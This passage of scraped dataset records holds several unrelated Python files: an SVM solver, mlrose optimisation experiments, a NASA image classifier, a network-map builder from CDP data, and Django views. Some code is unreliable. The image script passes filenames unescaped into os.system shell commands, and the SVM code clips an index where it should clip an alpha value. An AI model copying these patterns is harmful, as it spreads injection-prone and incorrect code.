1)))\n self.eCache = mat(zeros((self.m, 2)))\n n_iter = 0\n entire = True\n alpha_pairs_changed = 0\n\n while (n_iter < self.max_iter) and ((alpha_pairs_changed > 0) or entire):\n alpha_pairs_changed = 0\n if entire: # go over all\n for i in range(self.m): # iterate over number of observations\n alpha_pairs_changed += self.inner_l_k(i)\n print(\"fullSet, iter: %d i:%d, pairs changed %d\" % (n_iter, i, alpha_pairs_changed))\n n_iter += 1\n else: # go over non-bound (railed) alphas\n non_bound_is = nonzero((self.alphas.A > 0) * (self.alphas.A < self.C))[0]\n for i in non_bound_is:\n alpha_pairs_changed += self.inner_l_k(i)\n print(\"non-bound, iter: %d i:%d, pairs changed %d\" % (n_iter, i, alpha_pairs_changed))\n n_iter += 1\n\n if entire:\n entire = False # toggle entire set loop\n elif alpha_pairs_changed == 0:\n entire = True\n print(\"iteration number: %d\" % n_iter)\n\n return self.calc_ws()\n\n def predict(self, X):\n fx = dot(self.w.T, X.T) + self.b\n hyp = apply_along_axis(lambda x: 1 if x >= 0 else -1, 0, fx)\n return hyp\n\n def calc_ws(self):\n for i in range(self.m):\n self.w += multiply(self.alphas[i] * self.Y[i], self.X[i, :].T)\n return self.w\n\n def calc_ek_k(self, k):\n \"\"\"\n Calculates weight for observation, k\n :param k:\n :return:\n \"\"\"\n # f = w^T * x\n # f = (a * y)T * (X*(X_k)T) + b\n f = float(multiply(self.alphas, self.Y).T * (self.X * self.X[k, :].T)) + self.b\n # w = f - y\n w = f - float(self.Y[k])\n return w\n\n def select_j_k(self, i, e_i): #this is the second choice -heurstic, and calcs Ej\n max_k = -1\n max_delta_e = 0\n e_j = 0\n self.eCache[i] = [1, e_i] #set valid #choose the alpha that gives the maximum delta E\n valid_ecache_list = nonzero(self.eCache[:, 0].A)[0]\n if (len(valid_ecache_list)) > 1:\n for k in valid_ecache_list: #loop through valid Ecache values and find the one that maximizes delta E\n if k == i:\n continue #don't calc for i, waste of time\n e_k = self.calc_ek_k(k)\n delta_e = abs(e_i - e_k)\n if delta_e > max_delta_e:\n max_k = k\n max_delta_e = delta_e\n e_j = e_k\n return max_k, e_j\n else: #in this case (first time around) we don't have any valid eCache values\n j = select_j_rand(i, self.m)\n e_j = self.calc_ek_k(j)\n return j, e_j\n\n def update_ek_k(self, k): # after any alpha has changed update the new value in the cache\n e_k = self.calc_ek_k(k)\n self.eCache[k] = [1, e_k]\n\n def inner_l_k(self, 
i):\n\n Ei = self.calc_ek_k(i)\n\n if ((self.Y[i]*Ei < -self.tol) and (self.alphas[i] < self.C)) or \\\n ((self.Y[i]*Ei > self.tol) and (self.alphas[i] > 0)):\n\n j, Ej = self.select_j_k(i, Ei) # this has been changed from selectJrand\n\n alpha_i_old = self.alphas[i].copy()\n alpha_j_old = self.alphas[j].copy()\n\n if self.Y[i] != self.Y[j]:\n l = max(0, self.alphas[j] - self.alphas[i])\n h = min(self.C, self.C + self.alphas[j] - self.alphas[i])\n else:\n l = max(0, self.alphas[j] + self.alphas[i] - self.C)\n h = min(self.C, self.alphas[j] + self.alphas[i])\n if l == h:\n print(\"L==H\")\n return 0\n\n # eta = 2 * X_i * X_j - X_i * (X_i)T - X_j * (X_j)T\n eta = (2.0 * self.X[i, :] * self.X[j, :].T) - (self.X[i, :] * self.X[i, :].T) - (self.X[j, :] * self.X[j, :].T)\n if eta >= 0:\n print(\"eta>=0\")\n return 0\n\n self.alphas[j] -= self.Y[j]*(Ei - Ej)/eta\n self.alphas[j] = clip_alpha(j, h, l)\n self.update_ek_k(j) # added this for the Ecache\n if abs(self.alphas[j] - alpha_j_old) < 0.00001:\n print(\"j not moving enough\"); return 0\n self.alphas[i] += self.Y[j]*self.Y[i]*(alpha_j_old - self.alphas[j])#update i by the same amount as j\n self.update_ek_k(i) # added this for the Ecache #the update is in the oppselftie direction\n b1 = self.b - Ei - self.Y[i]*(self.alphas[i]-alpha_i_old)*self.X[i, :]*self.X[i, :].T - self.Y[j]*(self.alphas[j]-alpha_j_old)*self.X[i,:]*self.X[j, :].T\n b2 = self.b - Ej - self.Y[i]*(self.alphas[i]-alpha_i_old)*self.X[i, :]*self.X[j, :].T - self.Y[j]*(self.alphas[j]-alpha_j_old)*self.X[j,:]*self.X[j, :].T\n if (0 < self.alphas[i]) and (self.C > self.alphas[i]):\n self.b = b1\n elif (0 < self.alphas[j]) and (self.C > self.alphas[j]):\n self.b = b2\n else:\n self.b = (b1 + b2)/2.0\n return 1\n else:\n return 0\n\n\ndef clip_alpha(aj, H, L):\n if aj > H:\n aj = H\n if L > aj:\n aj = L\n return aj\n\n\ndef select_j_rand(i, m):\n j=i #we want to select any J not equal to i\n while (j==i):\n j = int(random.uniform(0,m))\n return j\n\n\n\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290046159","text":"import argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport mlrose_hiive as mlrose\nimport numpy as np\nimport time\n\nSIZE = 60\n\nalgs = {\n 'hill_climbing': mlrose.random_hill_climb,\n 'simulated_annealing': mlrose.simulated_annealing,\n 'genetic_alg': mlrose.genetic_alg,\n 'mimic': mlrose.mimic\n}\n\n# Define alternative N-Queens fitness function for maximization problem\ndef queens_max(state):\n \n # Initialize counter\n fitness = 0\n \n # For all pairs of queens\n for i in range(len(state) - 1):\n for j in range(i + 1, len(state)):\n \n # Check for horizontal, diagonal-up and diagonal-down attacks\n if (state[j] != state[i]) \\\n and (state[j] != state[i] + (j - i)) \\\n and (state[j] != state[i] - (j - i)):\n \n # If no attacks, then increment counter\n fitness += 1\n\n return fitness\n\n# note: genetic alg should excel at four peaks,\n# while RHC and annealing are likely to get stuck in the local optima with bigger basins (all 1s or all 0s).\n# annealing and RHC will perform well on onemax because there is only one optimum and it's global (wide basin).\n# MIMIC will perform best on kcolor, per Charles Isbell's paper\n# call_counter_array = np.zeros(100)\n# call_counter_idx = 0\n\nfitness_evals = []\n\ndef get_score(alg, problem, params, num_seeds = 30):\n fitnesses = []\n fitness_curves = []\n for 
random_seed in range(1,num_seeds+1):\n params.update({'random_state': random_seed, 'curve': True})\n\n global fitness_evals\n fitness_evals = []\n\n state, fitness, curve = alg(**params)\n \n fitnesses.append(fitness)\n fitness_curves.append(curve)\n \n print(state)\n \n avg_fitness_curve = [ np.mean( [ c[i] for c in fitness_curves ] ) for i in range(min([len(c) for c in fitness_curves])) ]\n return np.mean(fitnesses), avg_fitness_curve\n\n# def get_hyperparam_score(alg, problem, params):\n# fitness, curve = get_score(alg, problem, params, 20)\n# return fitness\n\ndef get_hyperparam_score(alg, problem, params, num_seeds = 20):\n fitnesses = []\n for random_seed in range(1, num_seeds+1):\n params.update({'random_state': random_seed, 'curve': True})\n state, fitness, curve = alg(**params)\n fitnesses.append(fitness)\n\n return np.mean(fitnesses)\n\ndef get_fitness_eval_curve():\n fitness_eval_x = []\n fitness_eval_y = []\n maximum = 0\n for i in range(len(fitness_evals)):\n if fitness_evals[i] > maximum:\n maximum = fitness_evals[i]\n fitness_eval_x.append(i)\n fitness_eval_y.append(fitness_evals[i])\n return fitness_eval_x, fitness_eval_y\n\ndef get_final_score(learner, fitness, hyperparams):\n problem = mlrose.DiscreteOpt(length = SIZE, fitness_fn = fitness, maximize = True)\n params = hyperparams.copy()\n params.update({'problem': problem})\n\n start = time.process_time()\n score, curve = get_score(alg, problem, params)\n print( 'Time taken to learn:', time.process_time() - start )\n\n print( 'Average Best Score over 30 random seeds:', score )\n\n plt.plot( curve )\n plt.xlabel( 'Iterations' )\n plt.ylabel( 'Average Fitness Score' )\n plt.suptitle( learner )\n plt.show()\n\n x, y = get_fitness_eval_curve()\n plt.plot(x, y)\n plt.xlabel( 'Fitness Function Evaluations' )\n plt.ylabel( 'Fitness Score' )\n plt.suptitle( learner )\n plt.show()\n return score\n\ndef find_best_hyperparameter(alg, fitness, params, param_name, possible_values, show_graph = True):\n best_avg_score = 0\n best_val = None\n scores = []\n for v in possible_values:\n problem = mlrose.DiscreteOpt(length = SIZE, fitness_fn = fitness, maximize = True)\n problem.set_mimic_fast_mode( True )\n cur_params = params.copy()\n cur_params.update({param_name: v, 'problem': problem})\n score = get_hyperparam_score(alg, problem, cur_params)\n scores.append(score)\n if score > best_avg_score:\n best_avg_score = score\n best_val = v\n \n # plot it\n if show_graph:\n plt.plot(possible_values, scores)\n plt.xlabel( f'{param_name}' )\n plt.ylabel( 'Average Fitness Score' )\n plt.suptitle( f'{param_name}' )\n plt.show()\n\n return best_val \n\ndef optimize_hyperparams(title, alg, fitness, params, hyperparams):\n best_hyperparams = {}\n for param_name, (possible_values, show_graph) in hyperparams.items():\n print( 'optimizing hyperparameter %s' % param_name )\n best_hyperparams[param_name] = find_best_hyperparameter(alg, fitness, params, param_name, possible_values, show_graph)\n print( 'optimal value found: %s' % best_hyperparams[param_name] )\n \n print('parameters optimized.')\n \n # print('parameters optimized. 
plotting learning curve with optimal params.')\n\n # problem = mlrose.DiscreteOpt(length = SIZE, fitness_fn = fitness, maximize = True)\n # temp_params = hyperparams.copy()\n # temp_params.update({'problem': problem})\n # score, curve = get_score(alg, problem, temp_params)\n # print('Score:', score)\n # plt.plot( curve )\n # plt.xlabel( 'Iterations' )\n # plt.ylabel( 'Average fitness score' )\n # plt.suptitle( title )\n # plt.show()\n \n return best_hyperparams\n\ndef optimize_hill_climbing_hyperparams(fitness):\n # params = { 'max_attempts': 100,\n # 'max_iters': 100,\n # 'restarts': 20 }\n params = { 'max_attempts': 200, 'restarts': 2000 }\n # mlrose.random_hill_climb()\n hyperparams = {}\n return params\n # return optimize_hyperparams( 'Random Hill Climbing', mlrose.random_hill_climb, fitness, params )\n\ndef optimize_simulated_annealing_hyperparams(fitness):\n params = { 'max_attempts': 100,\n 'max_iters': 1000 }\n hyperparams = {}\n return params\n # return optimize_hyperparams( 'Simulated Annualing', mlrose.simulated_annealing, fitness, params )\n\ndef optimize_genetic_alg_hyperparams(fitness):\n params = { 'max_attempts': 100 }\n if fitness == mlrose.OneMax:\n hyperparams = { 'pop_breed_percent': 0.7 }\n params.update(hyperparams)\n return params\n hyperparams = { 'pop_size': ( [ 100 + 20*i for i in range(11) ], True ),\n 'pop_breed_percent': ( [ 0.7 + 0.01*i for i in range(11) ], True ),\n 'elite_dreg_ratio': ( [ 0.95 + 0.01*i for i in range(5) ], True ),\n 'mutation_prob': ( [ 0.2 * i for i in range(1, 5) ], True ) }\n \n optimized = optimize_hyperparams( 'Genetic Alg', mlrose.genetic_alg, fitness, params, hyperparams )\n params.update(optimized)\n return params\n\ndef optimize_mimic_hyperparams(fitness):\n # params = { 'fast_mimic': True }\n params = {}\n if isinstance(fitness, mlrose.OneMax):\n hyperparams = {}\n params.update(hyperparams)\n return params\n elif isinstance(fitness, mlrose.MaxKColor):\n hyperparams = {}\n params.update(hyperparams)\n return params\n elif isinstance(fitness, mlrose.FourPeaks):\n hyperparams = { 'pop_size': 1200, 'keep_pct': 0.3 }\n params.update(hyperparams)\n return params\n hyperparams = { 'pop_size': ( [ 100 + 20*i for i in range(11) ], True ),\n 'keep_pct': ( [ 0.1 + 0.02*i for i in range(11) ], True ) }\n \n optimized = optimize_hyperparams( 'MIMIC', mlrose.mimic, fitness, params, hyperparams )\n params.update(optimized)\n return params\n\ndef get_custom_fitness(fitness):\n def counting_fitness(state):\n global fitness_evals\n score = fitness.evaluate(state)\n fitness_evals.append( score )\n return score\n return counting_fitness\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument( '--learner', action = 'store', dest = 'learner', required = True )\n parser.add_argument( '--problem', action = 'store', dest = 'problem', required = True )\n # parser.add_argument( '--size', action = 'store', dest = 'size', required = False, default = 8)\n args = parser.parse_args()\n\n # size = int(args.size)\n\n if args.problem == 'queens':\n fitness = mlrose.CustomFitness(queens_max)\n elif args.problem == 'onemax':\n fitness = mlrose.OneMax()\n elif args.problem == 'four_peaks':\n fitness = mlrose.FourPeaks(t_pct = 0.15)\n elif args.problem == 'kcolor':\n edges = [(0, 1), (0, 2), (0, 4), (1, 3), (2, 0), (2, 3), (3, 4)]\n fitness = mlrose.MaxKColor(edges)\n problem = mlrose.DiscreteOpt(length = 5, fitness_fn = fitness)\n init_state = np.array([0, 1, 0, 1, 1])\n else:\n raise RuntimeError(\"Invalid problem argument\")\n\n if 
args.learner == 'hill_climbing':\n hyperparams = optimize_hill_climbing_hyperparams(fitness)\n elif args.learner == 'simulated_annealing':\n hyperparams = optimize_simulated_annealing_hyperparams(fitness)\n elif args.learner == 'genetic_alg':\n hyperparams = optimize_genetic_alg_hyperparams(fitness)\n elif args.learner == 'mimic':\n hyperparams = optimize_mimic_hyperparams(fitness)\n else:\n raise RuntimeError(\"Invalid learner argument\")\n\n # hyperparams = {'max_attempts': 100, 'mutation_prob': 0.4}\n\n print( 'found hyperparams:', hyperparams )\n\n custom_fitness_function = get_custom_fitness(fitness)\n custom_fitness = mlrose.CustomFitness(custom_fitness_function)\n\n alg = algs[args.learner]\n \n get_final_score(args.learner, custom_fitness, hyperparams)\n \n # print( 'call counter array:', call_counter_array )\n # avg_best_score, avg_fitness_curve = get_score()\n\n # best_fitnesses = []\n # fitness_curves = []\n\n # for random_seed in range(30):\n # if args.learner == 'simulated_annealing':\n # # Define decay schedule\n # schedule = mlrose.ExpDecay()\n # best_state, best_fitness, fitness_curve = mlrose.simulated_annealing(problem, schedule = schedule, max_attempts = 100, max_iters = 1000, curve = True, random_state = random_seed)\n # elif args.learner == 'hill_climbing':\n # best_state, best_fitness, fitness_curve = mlrose.random_hill_climb(problem, restarts = 100, max_attempts = 100, max_iters = 100, curve = True, random_state = random_seed)\n # elif args.learner == 'genetic_alg':\n # best_state, best_fitness, fitness_curve = mlrose.genetic_alg(problem, max_attempts = 100, curve = True)\n # elif args.learner == 'mimic':\n # best_state, best_fitness, fitness_curve = mlrose.mimic(problem, curve = True, random_state = random_seed)\n # else:\n # raise ValueError('Invalid learner argument')\n\n # best_fitnesses.append(best_fitness)\n # fitness_curves.append(fitness_curve)\n # print('The curve is: ', fitness_curve)\n # print(len( fitness_curve ))\n\n # avg_best_fitness = np.mean( best_fitnesses )\n # avg_fitness_curve = [ np.mean( [ c[i] for c in fitness_curves ] ) for i in range(100) ]\n # plt.plot( avg_fitness_curve )\n # plt.xlabel( 'Iterations' )\n # plt.ylabel( 'Average fitness score' )\n # plt.suptitle( args.learner )\n # plt.show()","sub_path":"ro.py","file_name":"ro.py","file_ext":"py","file_size_in_byte":11252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"461490653","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras import models\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport gc\n\ndef get_images():\n \n with open(\"mfr_list.csv\", \"r\") as mfr_list:\n \n mfrs = mfr_list.readlines()\n mfrs = mfrs[:-1]\n \n missions = []\n \n for i in range(1,len(mfrs)):\n missions.append(mfrs[i].split('-E-'))\n mfrs[i] = mfrs[i].strip(\"\\n\")\n\n mfr_list.close()\n \n os.chdir(\"../dataset/mfr_processing/\")\n \n for i in range(1, 5001):\n os.system(\"wget https://eol.jsc.nasa.gov/DatabaseImages/ESC/small/\"+missions[i][0]+\"/\"+mfrs[i]+\".JPG\")\n \n os.chdir(\"../../scripts/\")\n \n return \n\nif os.path.exists(\"../dataset/mfr_processing/ISS038-E-65727.JPG\"):\n print(\"Images Available\")\nelse:\n get_images()\n\nimage_names = pd.read_csv(\"mfr_list.csv\")\nimage_names = image_names.apply(lambda x: x+\".JPG\")\n\nmodel = models.load_model(\"../models/darkskies_model_VGG16.h5\")\n#model.load_weights(\"../models/\")\n\ntest_datagen=ImageDataGenerator(rescale=1./255.)\n 
\ntest_generator=test_datagen.flow_from_dataframe(dataframe=image_names[:5001],\n directory=\"../dataset/mfr_processing/\",\n x_col=\"MFR\",\n batch_size=1,\n seed=42,\n shuffle=False,\n class_mode=None,\n target_size=(300,300))\n\npredictions=[]\n\nfor batch in range(len(test_generator)):\n pred=model.predict(test_generator[batch], verbose = 1)\n if np.argmax(pred) == 0:\n predictions.append(\"Aurora\")\n elif np.argmax(pred) == 1:\n predictions.append(\"Black\")\n elif np.argmax(pred) == 2:\n predictions.append(\"City\")\n elif np.argmax(pred) == 3:\n predictions.append(\"Astronomical\")\n else:\n continue\n\nfilenames=test_generator.filenames\nresults=pd.DataFrame({\"Filename\":filenames,\n \"Predictions\":predictions})\n\nresults[\"Filename\"] = results[\"Filename\"].apply(lambda x: x.rstrip(\".JPG\"))\nresults.to_csv(\"results.csv\", index=False)\n\ngc.collect()\n\nresults[\"Filename\"] = results[\"Filename\"].apply(lambda x: x+\".JPG\")\n\nos.chdir(\"../dataset/mfr_processing/\")\n\nfor result in range(len(results[\"Predictions\"])):\n \n if results[\"Predictions\"][result] == \"Aurora\":\n os.system(\"mv \"+results[\"Filename\"][result]+\" Aurora/\")\n elif results[\"Predictions\"][result] == \"Black\":\n os.system(\"mv \"+results[\"Filename\"][result]+\" Black/\")\n elif results[\"Predictions\"][result] == \"City\":\n os.system(\"mv \"+results[\"Filename\"][result]+\" City/\")\n else:\n os.system(\"mv \"+results[\"Filename\"][result]+\" Astronomical/\")\n\n\n\n\n","sub_path":"testing_with_mfr.py","file_name":"testing_with_mfr.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"594146195","text":"def divide(dividend, divisor):\n if divisor == 0:\n raise ZeroDivisionError(\"Divisor cannot be 0.\")\n\n return dividend / divisor\n\ngrades = []\n\nprint(\"Welcome to the average grade program.\")\ntry:\n average = divide(sum(grades), len(grades))\n print(f\"The average grade is {average}.\")\nexcept ZeroDivisionError as e:\n print(\"There are no grades yet in your list.\")\n\n\nstudents = [\n {\"name\": \"Bob\", \"grades\": [75,90]},\n {\"name\": \"Rolf\", \"grades\": [3,40]},\n {\"name\": \"Jen\", \"grades\": [100,90]}\n]\n\ntry:\n for student in students:\n name = student[\"name\"]\n grades = student[\"grades\"]\n average = divide(sum(grades), len(grades))\n print(f\"{name} averaged {average}.\")\nexcept ZeroDivisionError:\n print(f\"ERROR: {name} has no grades!\")\nelse:\n print(\"-- All student averages calculated --\")\nfinally:\n print(\"-- End of student average calculation --\")\n\nclass TooManyPagesReadError(ValueError):\n pass\n\n\nclass Book:\n def __init__(self, name: str, page_count:int):\n self.name = name\n self.page_count = page_count\n self.pages_read = 0\n\n def __repr__(self):\n return(\n f\"\"\n )\n\n def read(self, pages:int):\n if self.pages_read + pages > self.page_count:\n raise TooManyPagesReadError(\n f\"You tried to read {self.pages_read + pages} pages, but this book only has {self.page_count} pages.\"\n )\n self.pages_read += pages\n print (f\"You have now read {self.pages_read} pages out of {self.page_count}\")\n\npython101 = Book(\"Python 101\", 50)\npython101.read(35)\npython101.read(50)","sub_path":"exercise44_errors.py","file_name":"exercise44_errors.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"540090738","text":"class Tree:\n def __init__(self, 
val=None):\n self.val = val\n self.right = None\n self.left = None\n\n def add(self, val):\n if self.val is None:\n self.val = val\n elif val > self.val:\n if self.right is None:\n self.right = Tree(val)\n else:\n self.right.add(val)\n else:\n if self.left is None:\n self.left = Tree(val)\n else:\n self.left.add(val)\n\n\nn_test, layers = map(int, input().split())\nshapes = set()\nfor i in range(n_test):\n tr = Tree()\n for val in list(map(int,input().split())):\n tr.add(val)\n q = [tr]\n string = str()\n while len(q):\n node = q.pop()\n string += 'l' if node.left else 'n'\n string += 'r' if node.right else 'n'\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n shapes.add(string)\nprint(len(shapes))\n\n","sub_path":"ceiling function_2.py","file_name":"ceiling function_2.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89676652","text":"import sqlite3\r\nfrom pprint import pprint\r\nfrom common_functions import *\r\nfrom cdp_work import *\r\nfrom yed_work import *\r\nimport random\r\n\r\n\r\nmap_name = \"RH 6.graphml\"\r\n\r\ndef do_i_want_this(host):\r\n\ti_want_these = [\r\n\t\"peb_4506_06\",\r\n\t]\r\n\tfor i_want in i_want_these:\r\n\t\tif i_want in host:\r\n\t\t\treturn True\r\n\treturn False\r\n\r\n\r\nconnected_hosts = []\r\ndef it_is_dupe(existing_conns, this_connectoin):\r\n if this_connection in existing_conns:\r\n return True\r\n swapped_direction = {}\r\n swapped_direction[\"local_interface\"] =this_connectoin[\"remote_interface\"]\r\n swapped_direction[\"remote_interface\"] =this_connectoin[\"local_interface\"]\r\n swapped_direction[\"origin_host\"] =this_connectoin[\"other_host\"]\r\n swapped_direction[\"other_host\"] =this_connectoin[\"origin_host\"]\r\n if swapped_direction in existing_conns:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef sanatize_hostname(host):\r\n\tbad_charicters = [\"&\"]\r\n\r\n\tfor bad_char in bad_charicters:\r\n\t\tif bad_char in host:\r\n\t\t\tprint (host)\r\n\t\t\thost = host.replace(bad_char,\"\")\r\n\treturn host\r\n\r\n\r\ndef pull_ips_from_running_config(running):\r\n\trunning = running.split(\"\\n\")\r\n\tlocal_ips=[]\r\n\tip_lines = find_child_text (running, \"ip address\")\r\n\tfor ip_line in ip_lines:\r\n\t\tfor each_line in ip_line:\r\n\t\t\t#print (each_line)\r\n\t\t\ttry:\r\n\t\t\t\tlocal_ips.append(get_ip(each_line)[0])\r\n\t\t\texcept:\r\n\t\t\t\tfor ip in get_ip(each_line):\r\n\t\t\t\t\tlocal_ips.append(ip)\r\n\treturn (local_ips)\r\n\r\ndef pull_count(db_name):\r\n\tconn = sqlite3.connect(db_name)\r\n\tcur = conn.cursor()\r\n\tcommand =\"\"\"select count(site_name) from devices;\r\n\t\"\"\"\r\n\toutput = cur.execute(command)\r\n\treturn output\r\n\r\n\r\ndef pull_cdp_info(db_name):\r\n\tconn = sqlite3.connect(db_name)\r\n\tcur = conn.cursor()\r\n\tcommand =\"\"\" select site_name,CDP_nei from devices;\"\"\"\r\n\toutput = cur.execute(command)\r\n\treturn output\r\n\r\n\r\ndef put_in_xml_start(map):\r\n\tmap = map_start\r\n\treturn map\r\n\r\n\r\n\r\n#def dont_put_this_in_map(hostname):\r\n#\tbad_hostnames = [\"SEP\"]\r\n#\tfor bad_host in bad_hostnames:\r\n#\t\tif bad_host in hostname:\r\n#\t\t\treturn True\r\n#\treturn False\r\n\r\ndef put_in_nodes(hosts,node ):\r\n\tmap = ''\r\n\tfor host in hosts:\r\n\t\tif is_it_a_phone(host) == True:\r\n\t\t\tcontinue\r\n\r\n\r\n\t\thost = sanatize_hostname(host)\r\n\t\tmap = map +node.format(host, host, \"rectangle\")\r\n\treturn map\r\n\r\ndef 
put_in_connections(map,connections_data,link):\r\n\tmap = \"\"\r\n\tkeys = []\r\n\tfor connection in connections_data:\r\n\t\t# #ID,Source, Target, description, description\r\n\t\tif is_it_a_phone(connection['origin_host']) == True:\r\n\t\t\tcontinue\r\n\t\tif is_it_a_phone(connection['other_host']) == True:\r\n\t\t\tcontinue\r\n\r\n\r\n\t\tif connection['origin_host'] not in connected_hosts:\r\n\t\t\tconnected_hosts.append(connection['origin_host'])\r\n\t\tif \tconnection['other_host'] not in connected_hosts:\r\n\t\t\tconnected_hosts.append(connection['other_host'])\r\n\r\n\t\tconnection['origin_host'] = sanatize_hostname(connection['origin_host'])\r\n\t\tconnection['other_host'] = sanatize_hostname(connection['other_host'])\r\n\t\tid = 10\r\n\r\n\t\tnew_id_needed = True\r\n\t\twhile new_id_needed == True:\r\n\t\t\tid = str(random.randint(1, 100000000))\r\n\t\t\tif id not in keys:\r\n\t\t\t\tkeys.append(id)\r\n\t\t\t\tnew_id_needed = False\r\n\r\n\t\tdescription = str(connection['local_interface'])+\" \"+str(connection['remote_interface'])\r\n\t\tmap = map+link.format(id,connection['origin_host'],connection['other_host'],description,description)\r\n\treturn map\r\n\r\n\r\n\r\n\r\ndb_name = 'Network_info.db'\r\n\r\nconnections = []\r\npprint (\"Pulling CDP data from database\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nall_cpd_data = pull_cdp_info(db_name)\r\npprint (\"Parsing CDP Data\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nfor tmp_site_cdp_data in all_cpd_data:\r\n\thostname = tmp_site_cdp_data[0]\r\n\tsite_cdp_data= tmp_site_cdp_data[1]\r\n\tcdp_neigh_data = cdpNeighbors(site_cdp_data)\r\n\t#print (hostname)\r\n\t#pprint(cdp_neigh_data)\r\n\tfor each in cdp_neigh_data:\r\n\t\t#pprint (each)\r\n\t\tconnections.append([hostname,each])\r\n\t#print (\"\\n\\n\\n\\n\\n\\n\\n\")\r\n\r\nprint (\"Building connection list\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nconnections_data = []\r\nfor each in connections:\r\n\ti_want = False\r\n\tthis_connection = {}\r\n\tthis_connection['origin_host'] = each[0]\r\n\tif do_i_want_this(this_connection['origin_host']) == True:\r\n\t\ti_want = True\r\n\tcdp_data = each[1]\r\n\tthis_connection['other_host'] = cdp_data[\"deviceId\"]\r\n\tif do_i_want_this(this_connection['other_host']) == True:\r\n\t\ti_want = True\r\n\tif i_want == False:\r\n\t\tcontinue\r\n\tthis_connection['other_host'] = remove_end(this_connection['other_host'],\"\\.\")\r\n\tthis_connection['local_interface'] = cdp_data[\"localInterface\"]\r\n\tthis_connection['remote_interface'] = cdp_data[\"interface\"]\r\n\tif len(connections_data) == 0:\r\n\t\tconnections_data.append(this_connection)\r\n\telse:\r\n\t\tif it_is_dupe(connections_data, this_connection) == False:\r\n\t\t\tconnections_data.append(this_connection)\r\n\r\n\r\nhosts = []\r\nprint (\"Building host list\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nfor this_connection in connections_data:\r\n#\tprint (this_connection)\r\n#\tprint (len(hosts))\r\n\tif this_connection['origin_host'] not in hosts:\r\n\t\thosts.append(this_connection['origin_host'])\r\n\tif this_connection['other_host'] not in hosts:\r\n\t\thosts.append(this_connection['other_host'])\r\n\t\t\r\n#pprint (hosts)\r\n#print (len(hosts))\r\n\r\npprint (\"putting in connections\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nconnections = put_in_connections(map,connections_data,link)\r\n\r\n\r\n\r\nprint (\"Making the map.\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nmap = \"\"\r\n\r\nmap = put_in_xml_start (map)\r\npprint (\"putting in nodes\")\r\nprint 
(get_time())\r\nprint (\"\\n\")\r\nnodes = put_in_nodes(connected_hosts,node )\r\n\r\n\r\n\r\nmap = put_in_xml_start (map)+nodes+connections+map_end\r\n\r\n\r\nprint (\"Writting map to drive\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nto_doc_w(map_name,map)\r\nprint (\"Done\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\n\r\n\r\npprint (connected_hosts)","sub_path":"Build physical connection small map.py","file_name":"Build physical connection small map.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"546460453","text":"from django.shortcuts import render, redirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\n\nfrom uploads.core.models import Document\nfrom uploads.core.forms import DocumentForm\nfrom django.http import JsonResponse\nfrom django.core import serializers\n\nimport json\nimport random\nimport pandas as pd\n\n\n\ndef home(request):\n documents = Document.objects.all()\n return render(request, 'core/home.html', { 'documents': documents })\n\n\ndef simple_upload(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'core/simple_upload.html', {\n 'uploaded_file_url': uploaded_file_url\n })\n return render(request, 'core/simple_upload.html')\n\n\ndef model_form_upload(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = DocumentForm()\n return render(request, 'core/model_form_upload.html', {\n 'form': form\n })\n\ndef d3_data(request):\n #data = [50,100,150,200,250,130,210]\n data = random.sample(range(50, 300), 20)\n data_json= json.dumps(data)\n return render(request, 'core/d3Chart.html',{\"data_json\" : data_json})\n\ndef chordPlot(request):\n ChordData = [[11975, 5871, 8916, 2868],[ 1951, 10048, 2060, 6171],[ 8010, 16145, 8090, 8045],[ 1013, 990, 940, 6907]]\n #ChordData = [150,100,75,50,100,150,200,250,130,210]\n ChordData_json= json.dumps(ChordData)\n return render(request, 'core/chordDiagrame.html',{\"ChordData_json\" : ChordData_json})\n\n\ndef simple_upload(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n df = pd.read_csv(myfile)\n matrix = df.values.tolist()\n matrix_json = json.dumps(matrix)\n return render(request, 'core/chordDiagrame.html', {\n 'matrix_json': matrix_json\n })\n return render(request, 'core/simple_upload.html')\n\ndef Ichord(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n df = pd.read_csv(myfile)\n df1 = pd.DataFrame({\"name\": df.columns, \"color\": randomColor(len(df.columns))})\n names = [{k: df1.values[i][v] for v, k in enumerate(df1.columns)} for i in range(len(df1))]\n #names = list(df.columns)\n names_json = json.dumps(names,ensure_ascii= False).encode('utf8')\n\n matrix = df.values.tolist()\n matrix_json = json.dumps(matrix)\n return render(request, 'core/IntChord.html', 